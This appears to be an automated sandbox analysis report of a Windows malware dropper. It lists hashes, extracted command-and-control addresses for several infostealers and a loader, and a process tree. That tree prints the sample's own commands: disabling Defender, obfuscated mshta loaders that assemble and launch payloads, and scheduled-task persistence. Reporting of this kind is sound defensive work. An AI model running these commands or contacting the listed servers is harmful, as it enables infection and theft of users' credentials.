Analysis

  • max time kernel
    39s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    19/11/2021, 18:12

General

  • Target

    ab0bd8932a92421272b5911e2ebf488b.exe

  • Size

    9.7MB

  • MD5

    ab0bd8932a92421272b5911e2ebf488b

  • SHA1

    8fc75411fae94208b303c30faf3f4ba7385f8e22

  • SHA256

    61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791

  • SHA512

    587d69b5016732170311cbfd85ca04c5b8127158e839e0155a6c225f3dd4e9a9f8a38b758316d557ceaf1b7c676c86f46250a5d3fd34c33681003cc41f1ddbc9

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

smokeloader

Version

2020

C2

http://membro.at/upload/

http://jeevanpunetha.com/upload/

http://misipu.cn/upload/

http://zavodooo.ru/upload/

http://targiko.ru/upload/

http://vues3d.com/upload/

Extracted

Family

redline

Botnet

media151

C2

91.121.67.60:51630

Extracted

Family

vidar

Version

48.3

Botnet

933

Attributes
  • profile_id

    933

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe
    "C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:684
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:364
      • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
            PID:1292
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:852
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            4⤵
              PID:1256
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1724
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe
              4⤵
              • Loads dropped DLL
              PID:1376
              • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe
                Mon135d1cd0566c227c.exe
                5⤵
                • Executes dropped EXE
                PID:928
                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                  6⤵
                    PID:2096
                    • C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
                      "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
                      7⤵
                        PID:1556
                        • C:\Users\Admin\AppData\Roaming\5592368.exe
                          "C:\Users\Admin\AppData\Roaming\5592368.exe"
                          8⤵
                            PID:1292
                          • C:\Users\Admin\AppData\Roaming\8164961.exe
                            "C:\Users\Admin\AppData\Roaming\8164961.exe"
                            8⤵
                              PID:3000
                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                9⤵
                                  PID:880
                              • C:\Users\Admin\AppData\Roaming\5579078.exe
                                "C:\Users\Admin\AppData\Roaming\5579078.exe"
                                8⤵
                                  PID:992
                                • C:\Users\Admin\AppData\Roaming\7804314.exe
                                  "C:\Users\Admin\AppData\Roaming\7804314.exe"
                                  8⤵
                                    PID:2920
                                    • C:\Users\Admin\AppData\Roaming\7935225.exe
                                      "C:\Users\Admin\AppData\Roaming\7935225.exe"
                                      9⤵
                                        PID:2236
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )
                                          10⤵
                                            PID:2908
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\7935225.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\7935225.exe" ) do taskkill -IM "%~NxL" -F
                                              11⤵
                                                PID:3068
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill -IM "7935225.exe" -F
                                                  12⤵
                                                  • Kills process with taskkill
                                                  PID:2640
                                                • C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe
                                                  ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM
                                                  12⤵
                                                    PID:1992
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )
                                                      13⤵
                                                        PID:2760
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F
                                                          14⤵
                                                            PID:2768
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" Vbscript: CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN ( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ) )
                                                          13⤵
                                                            PID:2224
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly
                                                              14⤵
                                                                PID:2764
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"
                                                                  15⤵
                                                                    PID:3040
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                    15⤵
                                                                      PID:2676
                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                      msiexec.exe -Y ..\VYGDVP.ly
                                                                      15⤵
                                                                        PID:2508
                                                          • C:\Users\Admin\AppData\Roaming\1992774.exe
                                                            "C:\Users\Admin\AppData\Roaming\1992774.exe"
                                                            9⤵
                                                              PID:112
                                                          • C:\Users\Admin\AppData\Roaming\6803894.exe
                                                            "C:\Users\Admin\AppData\Roaming\6803894.exe"
                                                            8⤵
                                                              PID:1284
                                                          • C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
                                                            7⤵
                                                              PID:1620
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 968
                                                                8⤵
                                                                • Program crash
                                                                PID:2468
                                                            • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                              7⤵
                                                                PID:560
                                                              • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                                                                7⤵
                                                                  PID:2528
                                                                • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                                                                  7⤵
                                                                    PID:2404
                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                    7⤵
                                                                      PID:1284
                                                                    • C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"
                                                                      7⤵
                                                                        PID:2416
                                                                      • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                        7⤵
                                                                          PID:2212
                                                                        • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                          7⤵
                                                                            PID:2132
                                                                          • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                            7⤵
                                                                              PID:2868
                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                              7⤵
                                                                                PID:1500
                                                                                • C:\Windows\System32\conhost.exe
                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                  8⤵
                                                                                    PID:2300
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                      9⤵
                                                                                        PID:1488
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                          10⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:2412
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                        9⤵
                                                                                          PID:1612
                                                                                          • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                            C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                            10⤵
                                                                                              PID:2804
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe
                                                                                  4⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:976
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe
                                                                                    Mon133b4073df5e3f72.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:1460
                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                      "C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )
                                                                                      6⤵
                                                                                        PID:2040
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe") do taskkill /f -im "%~nXZ"
                                                                                          7⤵
                                                                                            PID:2208
                                                                                            • C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe
                                                                                              3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2308
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF ""/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9"" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )
                                                                                                9⤵
                                                                                                  PID:2364
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"
                                                                                                    10⤵
                                                                                                      PID:2504
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" vbscript:ClOse ( CReatEobJeCt ("wscrIPt.SHElL" ). RuN ( "C:\Windows\system32\cmd.exe /q/r EChO | sEt /P = ""MZ"" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F " ,0 ,TrUe ) )
                                                                                                    9⤵
                                                                                                      PID:2600
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F
                                                                                                        10⤵
                                                                                                          PID:2660
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                                            11⤵
                                                                                                              PID:2696
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>XlaE8u7.Rq"
                                                                                                              11⤵
                                                                                                                PID:2708
                                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                                control.exe .\PcAKEO.F
                                                                                                                11⤵
                                                                                                                  PID:2736
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F
                                                                                                                    12⤵
                                                                                                                      PID:2776
                                                                                                                      • C:\Windows\system32\RunDll32.exe
                                                                                                                        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\PcAKEO.F
                                                                                                                        13⤵
                                                                                                                          PID:3008
                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\PcAKEO.F
                                                                                                                            14⤵
                                                                                                                              PID:3020
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /f -im "Mon133b4073df5e3f72.exe"
                                                                                                                  8⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2320
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe
                                                                                                          4⤵
                                                                                                            PID:1864
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe
                                                                                                              Mon13d453d994180b.exe
                                                                                                              5⤵
                                                                                                                PID:2820
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-BL57H.tmp\Mon13d453d994180b.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-BL57H.tmp\Mon13d453d994180b.tmp" /SL5="$301E0,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe"
                                                                                                                  6⤵
                                                                                                                    PID:2912
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon1348816450.exe
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1740
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe
                                                                                                                  Mon1348816450.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1332
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon13459b4085.exe
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1752
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe
                                                                                                                  Mon13459b4085.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:888
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1012
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe
                                                                                                                  Mon13136643d24e51.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:1504
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon13073304e5395.exe
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1976
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe
                                                                                                                  Mon13073304e5395.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:684
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp" /SL5="$10186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:1912
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe" /SILENT
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:1576
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp" /SL5="$20186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe" /SILENT
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:240
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe
                                                                                                                4⤵
                                                                                                                  PID:1312
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe
                                                                                                                  4⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:1720
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe
                                                                                                                    Mon134ab4d3e88a4d3e.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:1448
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo
                                                                                                                  4⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:304
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe
                                                                                                                    Mon13470f9aa951f871.exe /mixtwo
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:752
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe
                                                                                                                      Mon13470f9aa951f871.exe /mixtwo
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:2004
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 460
                                                                                                                        7⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Program crash
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2116
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon13be6b39578.exe
                                                                                                                  4⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:912
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe
                                                                                                                    Mon13be6b39578.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:752
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe
                                                                                                                  4⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:1244
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                    Mon13bb1ac8986b773.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:1264
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2168
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2272
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe
                                                                                                                  4⤵
                                                                                                                    PID:1064
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe
                                                                                                                      Mon13248c3d7ea8c81.exe
                                                                                                                      5⤵
                                                                                                                        PID:2836
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe" -u
                                                                                                                          6⤵
                                                                                                                            PID:2884
                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                  1⤵
                                                                                                                  • Process spawned unexpected child process
                                                                                                                  PID:2228
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                    2⤵
                                                                                                                      PID:2216
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                    1⤵
                                                                                                                      PID:2344
                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                      1⤵
                                                                                                                        PID:956
                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                        1⤵
                                                                                                                        • Process spawned unexpected child process
                                                                                                                        PID:2564
                                                                                                                      • C:\Windows\system32\makecab.exe
                                                                                                                        "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211119181100.log C:\Windows\Logs\CBS\CbsPersist_20211119181100.cab
                                                                                                                        1⤵
                                                                                                                          PID:2884

                                                                                                                        Network

                                                                                                                              MITRE ATT&CK Enterprise v6


                                                                                                                              Downloads


                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/924-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

